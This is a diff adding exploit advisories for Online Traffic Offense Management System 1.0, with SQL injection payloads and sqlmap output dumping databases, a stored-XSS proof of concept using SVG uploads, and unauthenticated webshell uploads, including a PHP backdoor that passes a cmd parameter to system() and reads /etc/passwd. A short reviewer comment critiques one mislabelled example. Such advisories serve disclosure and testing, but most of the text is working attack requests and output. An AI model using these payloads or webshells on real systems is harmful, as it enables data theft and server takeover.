+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #3* ((custom) POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1' AND 5855=5855 AND 'broT'='broT
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+[...]
+
+# Dump user, used database, all databases on the server using sqlmap
+
+C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch
+[...]
+[06:06:23] [INFO] testing MySQL
+[06:06:23] [INFO] confirming MySQL
+[06:06:24] [WARNING] reflective value(s) found and filtering out
+[06:06:24] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.48, PHP 7.4.23
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+[06:06:24] [INFO] fetching current user
+[06:06:24] [INFO] resumed: 'root@localhost'
+current user: 'root@localhost'
+[06:06:24] [INFO] fetching current database
+[06:06:24] [INFO] retrieved: 'traffic_offense_db'
+current database: 'traffic_offense_db'
+[06:06:24] [INFO] fetching database names
+[06:06:24] [INFO] retrieved: 'information_schema'
+[06:06:24] [INFO] retrieved: 'mysql'
+[06:06:24] [INFO] retrieved: 'performance_schema'
+[06:06:24] [INFO] retrieved: 'phpmyadmin'
+[06:06:24] [INFO] retrieved: 'test'
+[06:06:24] [INFO] retrieved: 'test2'
+[06:06:24] [INFO] retrieved: 'traffic_offense_db'
+available databases [7]:
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+[*] test2
+[*] traffic_offense_db
+
+[06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost'
+
+[*] ending @ 06:06:24 /2021-10-07/
\ No newline at end of file
diff --git a/exploits/php/webapps/50388.txt b/exploits/php/webapps/50388.txt
new file mode 100644
index 000000000..b1853fcc8
--- /dev/null
+++ b/exploits/php/webapps/50388.txt
@@ -0,0 +1,251 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### XSS Stored and XSS Reflected
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# XSS Stored - example vulnerable pages and parameters:
+
+* The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters
+* We can upload SVG file from XSS to all places in webapp
+* We can add evil code from admin account, regular user account and unauthenticated - we needs only request
+
+* http://localhost/traffic_offense/admin/?page=user
+ Parameters:
+ - firstname
+ - lastname
+ - user image - svg file with javascript code - XSS
+
+* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
+ Parameters:
+ - date_created
+ - ticket_no
+ - officer_id
+ - officer_name
+ - status
+ - remarks
+ - SVG file with javascript code - XSS
+
+* All application is vulnerable
+
+# XSS Reflected - example vulnerable pages and parameters:
+
+* http://localhost/traffic_offense/admin/?page
+ Parameters:
+ - page
+
+* http://localhost/traffic_offense/classes/Login.php
+ Parameters:
+ - username
+ - password
+
+* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
+ Parameters:
+ - id
+
+* http://localhost/traffic_offense/classes/Master.php
+ Parameters:
+ - id
+
+* http://localhost/traffic_offense/classes/Users.php
+ Parameters:
+ - id
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1 - XSS Reflected
+
+# Request using POST method, payload is in the parameter value id
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
+Content-Length: 1061
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=user
+Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------21986352462593413643786432583
+Content-Disposition: form-data; name="id"
+
+1337
+-----------------------------21986352462593413643786432583
+Content-Disposition: form-data; name="firstname"
+
+hacked
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 01:05:26 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 186
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 1337
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request using GET method, payload is in the parameter value id
+
+GET /traffic_offense/admin/offenses/view_details.php?id=1337' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 05:28:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 7893
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1337''' at line 1
+SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '1337''
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2
+
+# XSS Stored
+
+# Save JS payload in user profile and add SVG file from vuln script
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
+Content-Length: 4304
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=user
+Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="firstname"
+
+admin"/>

+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="lastname"
+
+admin"/>

+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="password"
+
+admnin123
+-----------------------------85748650716762987124528102
+Content-Disposition: form-data; name="img"; filename="xss.svg"
+Content-Type: image/svg+xml
+
+[...]SVG PAYLOAD[...]
+
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 05:31:29 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request download new user data
+
+GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 05:42:04 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 24719
+[...]
+
+
+[...]
+
+

+
+[...]
\ No newline at end of file
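Review bot: Example 1 is headed "XSS Reflected" but neither captured response demonstrates reflected script execution: the POST response body is the raw UPDATE statement assembled from the submitted values, and the GET response is a MariaDB syntax error echoing the SELECT with the injected quote, which is SQL error disclosure rather than XSS. The example should either show a payload being rendered unescaped in an HTML response or be re-labelled as SQL error disclosure and cross-referenced to the SQL injection advisory for the same application earlier in this commit. The header line `# Testeted on:` should read `# Tested on:`. A remediation line such as `# Fix: HTML-encode all echoed parameters with htmlspecialchars() and validate uploaded image types server-side (reject SVG or serve uploads with Content-Disposition: attachment)` would make the advisory useful to defenders as well as testers.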
diff --git a/exploits/php/webapps/50389.txt b/exploits/php/webapps/50389.txt
new file mode 100644
index 000000000..c8f44ba10
--- /dev/null
+++ b/exploits/php/webapps/50389.txt
@@ -0,0 +1,457 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### RCE - Remote Code Execution
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# RCE - we can exploit the RCE vulnerability in several ways:
+
+* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
+
+* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
+
+* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user
+
+* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
+
+* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1
+
+# Request send as Unauthenticated user
+
+POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
+Content-Length: 1184
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="firstname"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="lastname"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="username"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="password"
+
+hacked
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="type"
+
+1
+-----------------------------210106920639395210803657370685
+Content-Disposition: form-data; name="img"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+
+
+
+
+
+
+
+
+
+-----------------------------210106920639395210803657370685--
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 07:59:24 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+-----------------------------------------------------------------------------------------------------------------------
+# The file was uploaded to the uploads directory
+# Request to list files in uploads\
+
+GET /traffic_offense/uploads/ HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:06:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 2139
+Content-Type: text/html;charset=UTF-8
+
+
+
+
+
Index of /traffic_offense/uploads
+
+
+
Index of /traffic_offense/uploads
+
+ ![[ICO]](/icons/blank.gif) | Name | Last modified | Size | Description |
+
|
+![[PARENTDIR]](/icons/back.gif) | Parent Directory | | - | |
+![[IMG]](/icons/image2.gif) | 1629336240_avatar.jpg | 2021-08-19 09:24 | 11K | |
+![[IMG]](/icons/image2.gif) | 1629421080_tl-logo.png | 2021-08-20 08:58 | 5.2K | |
+![[IMG]](/icons/image2.gif) | 1633584660_xss.svg | 2021-10-07 07:31 | 3.4K | |
+![[TXT]](/icons/text.gif) | 1633593540_cmd.php |
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+# Request to webshell
+
+GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:10:10 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Access-Control-Allow-Origin: *
+Content-Length: 810
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+
+
+ Volume in drive C has no label.
+ Volume Serial Number is 283C-C6A0
+
+ Directory of C:\xampp\htdocs\traffic_offense\uploads
+
+07.10.2021 10:09 .
+07.10.2021 10:09 ..
+19.08.2021 09:24 11ÿ426 1629336240_avatar.jpg
+20.08.2021 08:58 5ÿ288 1629421080_tl-logo.png
+07.10.2021 07:31 3ÿ451 1633584660_xss.svg
+07.10.2021 09:59 252 1633593540_cmd.php
+07.10.2021 10:02 252 1633593720_cmd.php
+07.10.2021 09:02 drivers
+ 5 File(s) 20ÿ669 bytes
+ 3 Dir(s) 86ÿ494ÿ085ÿ120 bytes free
+
+
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2
+
+# Webshell as System Logo and next webshell as Potal Cover in System Information page
+
+# Request
+
+POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
+Content-Length: 3176
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=system_info
+Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="name"
+
+Online Traffic Offense Management System - PHP
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="short_name"
+
+OTOMS - PHP
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="about_us"
+
+About Us
Sample only
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="img"; filename="cmd.php"
+Content-Type: application/octet-stream
+
+
+
+
+
+
+
+
+
+
+-----------------------------339921602532596419562348365833
+Content-Disposition: form-data; name="cover"; filename="list.php"
+Content-Type: application/octet-stream
+
+" . $filename . "
";
+ }
+ closedir($handle);
+ } else {
+ echo "FILE: " . $fichero . "
";
+ $fp = fopen($fichero, "r");
+ $buffer = fread($fp, filesize($fichero));
+ echo $buffer;
+ fclose($fp);
+ }
+
+?>
+-----------------------------339921602532596419562348365833--
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 08:21:35 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 1
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+1
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php
+
+## Example 3
+
+# Webshell as photo in driver list page
+
+# Request
+
+POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
+Content-Length: 2148
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
+Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="license_id_no"
+
+vvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="lastname"
+
+vvvvvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="firstname"
+
+vvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="middlename"
+
+vvvvvvvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="dob"
+
+2021-10-07
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="present_address"
+
+vvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="permanent_address"
+
+vvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="civil_status"
+
+Single
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="nationality"
+
+vvvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="contact"
+
+vvvvvvvv
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="license_type"
+
+Student
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="image_path"
+
+
+-----------------------------12210274961293066124133837204
+Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
+Content-Type: application/octet-stream
+
+
+
+";
+ $cmd = ($_REQUEST['cmd']);
+ system($cmd);
+ echo "
";
+ die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+
+
+-----------------------------12210274961293066124133837204--
+
+-----------------------------------------------------------------------------------------------------------------------
+
+# Response
+
+HTTP/1.1 200 OK
